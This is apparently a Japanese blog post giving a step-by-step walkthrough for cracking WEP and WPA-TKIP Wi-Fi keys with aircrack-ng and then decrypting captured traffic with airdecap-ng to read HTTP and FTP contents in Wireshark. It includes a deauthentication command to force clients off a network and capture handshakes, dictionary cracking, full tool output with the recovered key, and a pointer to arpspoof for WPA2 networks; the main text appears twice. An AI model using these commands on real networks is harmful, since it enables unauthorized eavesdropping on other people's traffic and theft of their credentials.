WEPとWPA-TKIPのパケット盗聴、解析により盗まれるのは無線LANのアクセスパスワードだけじゃない。
パスワードのクラック後、airdecap-ngを用いてパケットを復号化すれば、ホイホイとLAN内の無暗号の通信が覗ける。
まずWEPの場合
$ aircrack-ng wep128bit.cap
WEP128bitはWEP64bitより2倍のキャプチャ量が必要だが、解析時間は64bitと同じ8秒でおわた。ネットブックでは40秒ほど。
解析したhexパスワードとキャプチャファイルを指定して復号化
$ airdecap-ng -w 61:62:63:64:65:66:67:68:69:6A:6B:6C:6D wep128bit.cap
復号化されたパケットファイルをwiresharkで開いてみる
$ wireshark wep128bit-dec.cap
httpリクエスト
ftpリクエストとレスポンス
WEPの場合、ただ空中を漂ってる電波をキャプチャして解析するだけで通信内容がホイホイだけども、
WPA-TKIPの場合は、TKIPの暗号化に使われるキーストリームは128bitの初期化ベクトルとテンポラリキーとクライアントのMACアドレスを用いて生成されているためハンドシェイクパケットが必須になる。
このハンドシェイクパケットはよっぽど運が良くない限りホイホイとキャプチャされない。
ハンドシェイクパケットを入手する手段としてaireplay-ngで切断させてしまう方法がある。
# aireplay-ng --deauth 1 -a apのmac -c クライアントのmac wlan0
ハンドシェイクパケットが取れたら
aircrackやcowpattyでクラック
$ aircrack-ng -w dict wpa-01.cap
復号化
$ airdecap-ng -e MyPlace -p mypassword wpa-01.cap
wiresharkで開いてみる
$ wireshark wpa-01-dec.cap
どうやらWPA2-AESは、パスワードとハンドシェイクパケットがあっても通信内容まで復号化は出来ないらしい。
WPA2-AES環境でパケットを盗聴するには内部に侵入してarpspoofとかでターゲットの経路に割り込む必要があるね。
パスワードのクラック後、airdecap-ngを用いてパケットを復号化すれば、ホイホイとLAN内の無暗号の通信が覗ける。
まずWEPの場合
$ aircrack-ng wep128bit.cap
Aircrack-ng 1.1
[00:00:08] Tested 27502 keys (got 87826 IVs)
KB depth byte(vote)
0 0/ 1 61(124672) B4(103680) AD(100096) 6A(99840) 5B(99072) A3(99072) AB(98816)
1 0/ 1 62(120832) 7F(103424) BF(99072) 88(98304) B2(98304) 57(97536) 77(97536)
2 0/ 1 63(128512) E3(99840) F7(99840) 3A(98816) A9(98816) 1B(98304) B2(97536)
3 0/ 1 64(123904) 85(102912) 8D(101632) DD(98560) EF(98304) 39(97536) 9C(97024)
4 0/ 1 65(115200) DD(100352) A0(99584) 58(99072) 69(98816) C5(98816) 1D(98304)
5 0/ 1 66(126720) E2(98560) 8B(98304) C1(98048) 11(97792) FC(97792) A3(97280)
6 0/ 1 67(112384) B8(99328) A2(98304) 93(97792) 3A(97024) DD(96768) B7(96512)
7 0/ 1 68(106752) BE(99584) 3E(97792) 9F(97536) 9C(97280) A9(97024) 2C(96768)
8 0/ 1 69(120576) 07(98304) 60(98304) 68(98304) 2D(98048) 9D(97536) EF(97280)
9 0/ 1 6A(113920) 06(99072) 26(98560) 79(98560) E0(98560) 29(98048) F5(98048)
10 0/ 1 95(99328) BE(99072) 0B(98048) 90(97792) DD(97792) 24(96768) 81(96768)
11 0/ 1 C4(101632) 43(100352) 1A(97536) 73(97536) 04(97024) 48(97024) 9E(97024)
12 0/ 1 6D(105696) 48(98572) 3F(97792) EE(97776) 1B(97484) 7F(97108) B1(96456)
KEY FOUND! [ 61:62:63:64:65:66:67:68:69:6A:6B:6C:6D ] (ASCII: abcdefghijklm )
Decrypted correctly: 100%
WEP128bitはWEP64bitより2倍のキャプチャ量が必要だが、解析時間は64bitと同じ8秒でおわた。ネットブックでは40秒ほど。
解析したhexパスワードとキャプチャファイルを指定して復号化
$ airdecap-ng -w 61:62:63:64:65:66:67:68:69:6A:6B:6C:6D wep128bit.cap
Total number of packets read 327387
Total number of WEP data packets 88361
Total number of WPA data packets 16
Number of plaintext data packets 60
Number of decrypted WEP packets 88004
Number of corrupted WEP packets 0
Number of decrypted WPA packets 0
復号化されたパケットファイルをwiresharkで開いてみる
$ wireshark wep128bit-dec.cap
httpリクエスト
ftpリクエストとレスポンス
WEPの場合、ただ空中を漂ってる電波をキャプチャして解析するだけで通信内容がホイホイだけども、
WPA-TKIPの場合は、TKIPの暗号化に使われるキーストリームは128bitの初期化ベクトルとテンポラリキーとクライアントのMACアドレスを用いて生成されているためハンドシェイクパケットが必須になる。
このハンドシェイクパケットはよっぽど運が良くない限りホイホイとキャプチャされない。
ハンドシェイクパケットを入手する手段としてaireplay-ngで切断させてしまう方法がある。
# aireplay-ng --deauth 1 -a apのmac -c クライアントのmac wlan0
ハンドシェイクパケットが取れたら
aircrackやcowpattyでクラック
$ aircrack-ng -w dict wpa-01.cap
復号化
$ airdecap-ng -e MyPlace -p mypassword wpa-01.cap
Total number of packets read 4554
Total number of WEP data packets 0
Total number of WPA data packets 1919
Number of plaintext data packets 0
Number of decrypted WEP packets 0
Number of corrupted WEP packets 0
Number of decrypted WPA packets 1864
wiresharkで開いてみる
$ wireshark wpa-01-dec.cap
どうやらWPA2-AESは、パスワードとハンドシェイクパケットがあっても通信内容まで復号化は出来ないらしい。
WPA2-AES環境でパケットを盗聴するには内部に侵入してarpspoofとかでターゲットの経路に割り込む必要があるね。
- 関連記事
-
-
冷風機や冷風扇という地雷より室外機一体型の小型エアコンを
2014/07/12
-
RainbowCrackとやらを使ってみた
2011/12/17
-
airdecap-ngでWEP,WPA-TKIPパケットを復号化
2011/11/18
-
MS-RPC サービスを列挙
2011/11/15
-
MS-RPCを利用してWindowsアカウント情報を列挙
2011/11/14
-
